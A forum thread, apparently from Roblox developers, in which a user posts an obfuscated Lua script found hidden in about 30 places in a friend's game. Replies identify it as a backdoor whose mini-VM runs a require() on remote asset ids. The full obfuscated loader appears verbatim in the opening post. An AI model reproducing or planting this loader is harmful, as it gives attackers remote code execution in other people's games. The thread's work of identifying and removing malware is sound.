Anyone explain what this is?

Just looking through a place a friend of mine brought, and found this. Theres around 30 scripts with this in it, hidden in different models, so I’m assuming it’s some sort of virus. Can anyone explain?

local i=string.byte;local d=string.char;local c=string.sub;local u=table.concat;local L=getfenv or function()return _ENV end;local l=setmetatable;local s=select;local h=unpack;local r=tonumber;local function m(i)local e,n,a="","",{}local o=256;local t={}for l=0,o-1 do t[l]=d(l)end;local l=1;local function f()local e=r(c(i,l,l),36)l=l+1;local n=r(c(i,l,l+e-1),36)l=l+e;return n end;e=d(f())a[1]=e;while l<#i do local l=f()if t[l]then n=t[l]else n=e..c(e,1,1)end;t[o]=e..c(n,1,1)a[#a+1],e,o=n,n,o+1 end;return table.concat(a)end;local t=m('24327427424927526N24B22R23021F24B27427927B21I27E24326J23V27H23V27426M23N24Z24321I23N27F23N27H27V24326N27X23027U27426J24Z27H27S24327Q27S28428A24B27V27I27P27J28H24324727524124427526926U26A26E26Y28R24124127525D26U24027422B25221Y21423F25U29224323725U23A29725U243');local o=bit and bit.bxor or function(l,n)local e,o=1,0 while l>0 and n>0 do local a,c=l%2,n%2 if a~=c then o=o+e end l,n,e=(l-a)/2,(n-c)/2,e*2 end if l<n then l=n end while l>0 do local n=l%2 if n>0 then o=o+e end l,e=(l-n)/2,e*2 end return o end local function e(e,l,n)if n then local l=(e/2^(l-1))%2^((n-1)-(l-1)+1);return l-l%1;else local l=2^(l-1);return(e%(l+l)>=l)and 1 or 0;end;end;local l=1;local function n()local c,n,e,a=i(t,l,l+3);c=o(c,147)n=o(n,147)e=o(e,147)a=o(a,147)l=l+4;return(a*16777216)+(e*65536)+(n*256)+c;end;local function a()local e=o(i(t,l,l),147);l=l+1;return e;end;local function m()local l=n();local o=n();local c=1;local n=(e(o,1,20)*(2^32))+l;local l=e(o,21,31);local e=((-1)^e(o,32));if(l==0)then if(n==0)then return e*0;else l=1;c=0;end;elseif(l==2047)then return(n==0)and(e*(1/0))or(e*(0/0));end;return e*(2^(l-1023))*(c+(n/(2^52)));end;local r=n;local function f(e)local n;if(not e)then e=r();if(e==0)then return'';end;end;n=c(t,l,l+e-1);l=l+e;local e={}for l=1,#n do e[l]=d(o(i(c(n,l,l)),147))end return u(e);end;local l=n;local function u()local i={0,0,0,0,0,0,0,0,0,0};local l={};local c={};local t={i,nil,l,nil,nil,nil,c};t[5]=a();for e=1,n()do l[e-1]=u();end;for a=1,n()do local c=o(n(),125);local n=o(n(),165);local o=e(c,1,2);local l=e(n,1,11);local l={l,e(c,3,11),nil,nil,n};if(o==0)then l[3]=e(c,12,20);l[5]=e(c,21,29);elseif(o==1)then l[3]=e(n,12,33);elseif(o==2)then l[3]=e(n,12,32)-1048575;elseif(o==3)then l[3]=e(n,12,32)-1048575;l[5]=e(c,21,29);end;i[a]=l;end;local l=n()local n={0,0,0,0};for o=1,l do local e=a();local l;if(e==1)then l=(a()~=0);elseif(e==3)then l=m();elseif(e==2)then l=f();end;n[o]=l;end;t[2]=n t[6]=a();return t;end;local function m(l,e,f)local d=l[1];local i=l[2];local e=l[3];local e=l[6];return function(...)local n=1;local c=-1;local a={};local r={...};local l=s('#',...)-1;local o={};local o={nil,nil};for l=0,l do if(l>=e)then a[l-e]=r[l+1];else o[l]=r[l+1];end;end;local l;local t;while true do l=d[n];t=l[1];if t<=5 then if t<=2 then if t<=0 then do return end;elseif t>1 then local n=l[2];local a={};local e=0;local t=n+l[3]-1;for l=n+1,t do e=e+1;a[e]=o[l];end;local a={o[n](h(a,1,t-n))};local l=n+l[5]-2;e=0;for l=n,l do e=e+1;o[l]=a[e];end;c=l;else local e=l[2];if e>c then c=e end;o[e]=i[l[3]];end;elseif t<=3 then local e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];elseif t>4 then f[i[l[3]]]=o[l[2]];n=n+1;l=d[n];local e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];n=n+1;l=d[n];e=l[2];if e>c then c=e end;o[e]=i[l[3]];n=n+1;l=d[n];e=l[2];r={};local a=0;Limit=e+l[3]-1;for l=e+1,Limit do a=a+1;r[a]=o[l];end;local t={o[e](h(r,1,Limit-e))};Limit=e+l[5]-2;a=0;for l=e,Limit do a=a+1;o[l]=t[a];end;c=Limit;n=n+1;l=d[n];f[i[l[3]]]=o[l[2]];n=n+1;l=d[n];e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];n=n+1;l=d[n];e=l[2];if e>c then c=e end;o[e]=i[l[3]];n=n+1;l=d[n];e=l[2];r={};a=0;Limit=e+l[3]-1;for l=e+1,Limit do a=a+1;r[a]=o[l];end;t={o[e](h(r,1,Limit-e))};Limit=e+l[5]-2;a=0;for l=e,Limit do a=a+1;o[l]=t[a];end;c=Limit;n=n+1;l=d[n];e=l[2];o[e]();c=e-1;n=n+1;l=d[n];do return end;else do return end;end;elseif t<=8 then if t<=6 then local e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];elseif t>7 then local l=l[2];o[l]();c=l-1;else local l=l[2];o[l]();c=l-1;end;elseif t<=10 then if t>9 then local n=l[2];local a={};local e=0;local t=n+l[3]-1;for l=n+1,t do e=e+1;a[e]=o[l];end;local a={o[n](h(a,1,t-n))};local l=n+l[5]-2;e=0;for l=n,l do e=e+1;o[l]=a[e];end;c=l;else local e=l[2];if e>c then c=e end;o[e]=i[l[3]];end;elseif t==11 then f[i[l[3]]]=o[l[2]];else f[i[l[3]]]=o[l[2]];end;n=n+1;end;end;end;return m(u(),{},L())();

It looks like an obfuscated backdoor script. Probably require()'s some remote module to run whatever the script kiddie wants.

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I think you used a untrustable plugins or free models.
I suggest you to cut your game off any relation with roblox website.
(in order to avoid backdoored)
Delete all your plugin and free models.


Obfuscated code. I’ve seen some developers use it (I’m guessing to protect their code from being reverse-engineered/stolen) but if it’s from a public model/object I would suggest deleting it ASAP.


I tested this in an empty place and got an “Unable to find module for asset id” error, so this is definitely a virus. No sane person would obfuscate code this much if it wasn’t malicious.


If would be nice if Roblox added a property to ServerScriptService that lets you disable calling require() on remote module scripts.


The one example I’m drawing from comes from a Roblox group called “PodTech”, which creates assets for airline groups on Roblox. The aviation community is notoriously toxic and known for having scripts and assets stolen left and right, so I guess the owner had enough and decided to encrypt their stuff completely.

It’s an outlier case for sure, but I can see why people would want to obfuscate their stuff in certain situations. Maybe it’s more about knowing where it comes from?


It’s not my game, but I’ll tell them to do this :+1:

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Yes, i saw this in my game to. It’s a script that just randomly clones itself into random parts in workspace, i don’t know what it is though. I never use free models.

I dont think that is the case because its a script that clones itself into random objects in workspace, and my game is not about airlines.

This is kind of strange. Most of it is a custom mini-VM. But then that VM only gets used to execute a payload which is essentially Re = require(3319703854); Re(3319736847) - so yes, a remote code injection after all.

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